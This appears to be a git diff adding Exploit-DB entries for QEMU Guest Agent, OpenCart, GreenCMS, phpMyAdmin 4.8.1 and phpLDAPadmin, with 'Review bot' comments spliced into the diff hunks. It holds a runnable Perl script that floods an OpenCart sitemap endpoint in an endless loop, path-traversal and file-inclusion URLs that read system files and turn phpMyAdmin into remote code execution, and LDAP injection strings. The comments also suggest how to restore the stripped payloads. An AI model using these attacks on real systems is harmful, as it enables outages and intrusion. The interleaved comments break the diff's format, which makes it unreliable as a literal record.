diff --git a/exploits/linux/dos/44925.txt b/exploits/linux/dos/44925.txt
new file mode 100644
index 000000000..41849eb5e
--- /dev/null
+++ b/exploits/linux/dos/44925.txt
@@ -0,0 +1,46 @@
+# Exploit Title: QEMU Guest Agent 2.12.50 - Denial of Service
+# Date: 2018-06-07
+# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
+# Vendor Homepage: https://www.qemu.org/
+# Software Link: https://www.qemu.org/download/
+# Version: 2.12.50 and earlier
+# Tested on: 2.12.50
+# CVE : CVE-2018-12617
+
+# QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0()
+# call to trigger a segfault() call when trying to allocate a large memory chunk.
+# The vulnerability can be exploited by sending a specific QMP command to
+# the agent via the listening socket.
+
+1st, execute the guest-agent using the following command:
+
+$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp
+
+2nd, on the other console, connect to the UNIX socket using socat:
+
+$ socat unix-connect:/tmp/qga.sock -
+
+3rd, enter the following QMP command:
+
+{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+”}}
+{"return": 1000}
+{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}
+
+The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value. 
+
+#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107
+#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f770)
+#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
+#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
+#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
+#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
+#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
+#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
+#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
+#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
+#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
+#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
+#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a049)
+
+# References:
+# 1. https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg03385.html
\ No newline at end of file
diff --git a/exploits/php/dos/44927.pl b/exploits/php/dos/44927.pl
new file mode 100755
index 000000000..a16e96534
--- /dev/null
+++ b/exploits/php/dos/44927.pl
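Review bot: The `guest-file-open` command in the third step ends with a typographic closing quote, `"mode":"w+”}}`, so pasted as shown it is not valid JSON and the agent never returns the `{"return": 1000}` handle that the next command depends on; it should read `{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+"}}`. The header says the bug makes g_malloc0() "trigger a segfault() call", but the frames listed (`calloc` under ASan ← `g_malloc0` ← `qmp_marshal_guest_file_read`) describe an oversized allocation request, not a segmentation fault, so the description should state what was actually observed — presumably an ASan allocation-size error or an abort on allocation failure. It would also help to say that the `{"return": 1000}` line is agent output, not something to type, since it sits between the two commands with no marker.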
@@ -0,0 +1,76 @@
+#!/usr/bin/perl -w
+#
+# Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
+#
+# Copyright 2018 (c) Todor Donev
+# https://ethical-hacker.org/
+# https://facebook.com/ethicalhackerorg
+#
+# Tested store with added more than 1000 products
+#
+# [todor@adamantium cartkiller]# torsocks perl killcart.pl example.com
+# Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
+# Connecting example.com with 80 forks..
+# Bye, bye and good night..
+# Bye, bye and good night..
+# Bye, bye and good night..
+# ^C
+# [todor@adamantium cartkiller]#
+#
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk! 
+#
+# This exploit is buggy and proof of concept
+#
+use Parallel::ForkManager;
+use LWP;
+print "Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)\n";
+sub usage{
+ print "usg: perl $0 \n";
+ print "exmpl: perl $0 www.example.com\n";
+ print "https://ethical-hacker.org/\n";
+ print "https://facebook.com/ethicalhackerorg\n";
+ print "Copyright 2018 (c) Todor Donev \n";
+}
+if ($#ARGV < 0) {
+ usage;
+ exit;
+}
+my $numforks = 100;
+print "Connecting $ARGV[0] with $numforks forks..\n";
+sub killcart{
+my $pm = new Parallel::ForkManager($numforks);
+$|=1;
+srand(time());
+for ($k=0;$k<$numforks;$k++) {
+$pm->start and next;
+my $browser = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 },protocols_allowed => ['https']);
+# $browser->timeout(20);
+ $browser->agent('Mozilla/5.0');
+my $response = $browser->get("https://$ARGV[0]/index.php?route=extension/feed/google_sitemap");
+print "Loop detected: Opencart is still vulnerable but seems server is correct configured. Change forks.\n" if($response->code eq 508);
+print "Kill me! Google_Sitemap is turned off..\n" if($response->code eq 404);
+print "Bye, bye and good night..\n" if(($response->code eq 503 or $response->code eq 504));
+$pm->finish;
+}
+$pm->wait_all_children;
+}
+while(1) {
+killcart();
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/44922.txt b/exploits/php/webapps/44922.txt
new file mode 100644
index 000000000..133751777
--- /dev/null
+++ b/exploits/php/webapps/44922.txt
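Review bot: The script runs under `-w` but never enables strictures, so the loop counter in `for ($k=0;$k<$numforks;$k++) {` is an undeclared package global and any misspelled variable elsewhere is silently created; add `use strict;` and `use warnings;` after the shebang and write the loop as `for my $k (0 .. $numforks - 1) {`. `my $pm = new Parallel::ForkManager($numforks);` is indirect-object syntax, which parses differently when a sub named `new` is in scope; use `my $pm = Parallel::ForkManager->new($numforks);`. The sample session in the header reports "Connecting example.com with 80 forks.." while `$numforks` is hard-coded to 100, so one of the two is stale. Parallel::ForkManager is a CPAN module rather than core Perl, and the only timeout (`$browser->timeout(20)`) is commented out, so each child can block indefinitely on a server that has stopped answering; both points belong in the header so a user knows what to install and what to expect.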
@@ -0,0 +1,13 @@
+# Exploit Title: GreenCMS 2.3.0603 - remote obtain sensitive information
+# Date: 2018-06-21
+# Exploit Author: vr_system
+# Vendor Homepage: https://github.com/GreenCMS/GreenCMS/
+# Software Link: https://github.com/GreenCMS/GreenCMS/
+# Version: GreenCMS 2.3.0603
+# Tested on: windows 7
+# CVE : CVE-2018-12604
+
+# POC£ºhttp://site.com/Data/Log/year_month_day.log.
+# Tested Link:
+http://site.com/GreenCMS-beta/Data/Log/18_06_20.log
+http://site.com/Data/Log/18_06_20.log
\ No newline at end of file
diff --git a/exploits/php/webapps/44924.txt b/exploits/php/webapps/44924.txt
new file mode 100644
index 000000000..56a562c9b
--- /dev/null
+++ b/exploits/php/webapps/44924.txt
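Review bot: `# POC£ºhttp://site.com/Data/Log/year_month_day.log.` carries a mis-encoded full-width colon (`£º` is the GBK encoding of `：` read as Latin-1) and a trailing period that is not part of the URL; it should read `# POC: http://site.com/Data/Log/year_month_day.log`. The two tested links use a two-digit year (`18_06_20.log`), so the pattern line should say `YY_MM_DD.log` rather than `year_month_day.log`, otherwise a reader will try `2018_06_20.log` and conclude the log is absent. The advisory also never says what the log files contain that makes them sensitive; one line describing the kind of data observed would make the information-disclosure claim checkable.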
@@ -0,0 +1,50 @@
+The latest version downloaded from the official website, the file name is phpMyAdmin-4.8.1-all-languages.zip
+
+The problem appears in /index.php
+
+Find 55~63 lines
+
+Line 61 contains include $_REQUEST['target'];
+
+This is obviously LFI precursor, as long as we bypass the 55 to 59 restrictions on the line
+
+Line 57 restricts the target parameter from beginning with index
+
+Line 58 limit target parameter cannot appear within $target_blacklist
+
+Find the definition of $target_blacklist :
+
+In /index.php the first of 50 lines
+
+As long as the target parameter is not import.php or export.php, the last limit is Core::checkPageValidity($_REQUEST['target'])
+
+Find the checkPageValidity method of the Core class :
+
+Defined in the \ libraries \ classes \ core.php on the 443 line
+
+The problem is in urldecode() on line 465
+
+We can use this function to bypass the white list detection!
+
+I ? Twice url encoded as % 253f can bypass the validation!
+
+Payload:
+
+http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini
+
+
+- - -
+
+I thought the loophole was over, because I didn't find out where phpmyadmin could perform file operations to implement Getshell . After several weeks of inspiration, I thought of a way to get Shell without writing files .
+
+We all know that after login phpmyadmin , the database is completely controllable, then we can write the WebShell to the database and then include the database file?
+
+Tested locally, I found that if you use WebShell as the field value of the data table can be perfectly written to the database file:
+
+Find the corresponding database file:
+
+Include:
+
+Payload:
+
+http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm
\ No newline at end of file
diff --git a/exploits/php/webapps/44926.txt b/exploits/php/webapps/44926.txt
new file mode 100644
index 000000000..365b2235c
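Review bot: The second half of the write-up jumps from "Tested locally, I found that if you use WebShell as the field value ... written to the database file:" straight to "Find the corresponding database file:", "Include:" and the final URL, so the SQL statement that actually plants the code is missing (the screenshots evidently did not survive), and the `a=phpinfo();` parameter in that URL only makes sense if the stored value is something like `<?php eval($_GET['a']); ?>`; the statement that was run should be written out. The line `I ? Twice url encoded as % 253f can bypass the validation!` is garbled as well — as I read the surrounding text, the point is that `?` sent as `%253f` is decoded once by the web server to `%3f`, the `urldecode()` on line 465 turns it into `?` so the whitelist check sees `db_sql.php`, while the `include` on line 61 receives the undecoded string and `/../` walks past the bogus `db_sql.php%3f` segment, and one sentence saying so would replace the garbled one. The text should also state that both payloads require a logged-in phpMyAdmin session, which is implied by "after login phpmyadmin" but never made a precondition.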
--- /dev/null
+++ b/exploits/php/webapps/44926.txt
@@ -0,0 +1,27 @@
+# Exploit Title: phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)
+# Google Dork:N/A
+# Date: 21.06.2018
+# Exploit Author: Berk Dusunur
+# Vendor Homepage: http://phpldapadmin.sourceforge.net
+# Software Link: http://phpldapadmin.sourceforge.net
+# Version: 1.2.2
+# Tested on: Pardus / Debian Web Server
+# CVE : N/A
+
+#Vulnerable Code
+$server =
+$_SESSION[APPCONFIG]->getServer(get_request('server_id','REQUEST'));
+ if (count($server->untested()))
+ system_message(array(
+
+#Payload
+
+!(()&&!|*|*|
+
+#PoC 1
+
+http://target/phpldapadmin/cmd.php?cmd=login_form&server_id=1!(()&&!|*|*|&redirect=true
+
+#PoC 2
+
+login panel username use !(()&&!|*|*| password !(()&&!|*|*|
\ No newline at end of file
diff --git a/exploits/php/webapps/44928.txt b/exploits/php/webapps/44928.txt
new file mode 100644
index 000000000..6045f6a17
--- /dev/null
+++ b/exploits/php/webapps/44928.txt
@@ -0,0 +1,12 @@
+# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
+# Date: 2018-06-21
+# Exploit Author: VulnSpy
+# Vendor Homepage: http://www.phpmyadmin.net
+# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
+# Version: 4.8.0, 4.8.1
+# Tested on: php7 mysql5
+# CVE : CVE-2018-12613
+
+1. Run SQL Query : select ''
+2. Include the session file :
+http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b74cfdfae..900504871 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
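Review bot: The "Vulnerable Code" excerpt only shows `server_id` being handed to `getServer()`, which by its name selects a configured server entry, and nothing in the four quoted lines shows that value being placed into an LDAP filter, so PoC 1 (`server_id=1!(()&&!|*|*|`) does not demonstrate LDAP injection as presented. Either quote the code that builds the filter from the login username — which is what the title's "(Username)" and PoC 2 point at — or explain what the `server_id` payload is meant to show. The advisory also never states the observed result (an LDAP error echoed to the page, an authentication bypass, a PHP notice), so the impact cannot be judged from the text; a line such as `Result: <what the server returns for the payload>` is needed for the finding to be reproducible.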
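Review bot: Step 1 reads `1. Run SQL Query : select ''` — an empty string literal — so the PHP payload between the quotes has evidently been stripped (most likely because `<?php ... ?>` was treated as an HTML tag) and, as written, the step plants nothing and the inclusion in step 2 is harmless; it should be restored, e.g. `select '<?php phpinfo(); ?>'`. Step 2 should also say where `sess_11njnj4253qq93vjm9q93nvc7p2lq82k` comes from: it is the attacker's own PHP session id (presumably from the `phpMyAdmin` cookie, since the query text ends up in that session), and `/var/lib/php/sessions/` is a distribution default that must be adjusted to the target's `session.save_path`. Finally, the header should note that an authenticated phpMyAdmin session is required, since the SQL query is run from the logged-in console.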
@@ -6003,6 +6003,8 @@ id,file,description,date,author,type,platform,port
 44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux,
 44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
 44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows,
+44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
+44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
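Review bot: The new 44927 row describes the target as `Opencart < 3.0.2.0 - Denial of Service` while the script's own banner says `Opencart <= 3.0.2.0`, so the index excludes the exact version the author claims is affected; the description should be `"Opencart <= 3.0.2.0 - google_sitemap Denial of Service (Resource Exhaustion)"` (or the script's banner corrected) so the two agree. The same row sets the port column to 80, but the script only ever requests `https://$ARGV[0]/...` and restricts LWP to `protocols_allowed => ['https']`, so 443 would be the accurate port. The empty port on the 44925 row is correct, since that PoC talks to a Unix socket rather than a network service.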
@@ -39576,3 +39578,7 @@ id,file,description,date,author,type,platform,port
 44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80
 44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80
 44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80
+44922,exploits/php/webapps/44922.txt,"GreenCMS 2.3.0603 - Information Disclosure",2018-06-22,vr_system,webapps,php,
+44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion",2018-06-21,ChaMd5,webapps,php,
+44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80
+44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - Local File Inclusion",2018-06-22,VulnSpy,webapps,php,80
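Review bot: The 44928 row is titled `phpMyAdmin 4.8.1 - Local File Inclusion` although the file's own header says "Local File Inclusion to Remote Code Execution", lists both 4.8.0 and 4.8.1 as affected, and starts with a SQL query that can only be run from a logged-in session; it should read `"phpMyAdmin 4.8.0 / 4.8.1 - (Authenticated) Local File Inclusion to Remote Code Execution"` so it lines up with the sibling 44924 row, which already carries the "(Authenticated)" qualifier for the same bug. The 44922 and 44924 rows leave the port column empty while the other web-application rows in this hunk use 80, and both PoCs are plain HTTP URLs, so they should get 80 as well. The 44924 date (2018-06-21) also differs from the 2018-06-22 used for every other row added here; if that is not the actual publication date it should be made consistent.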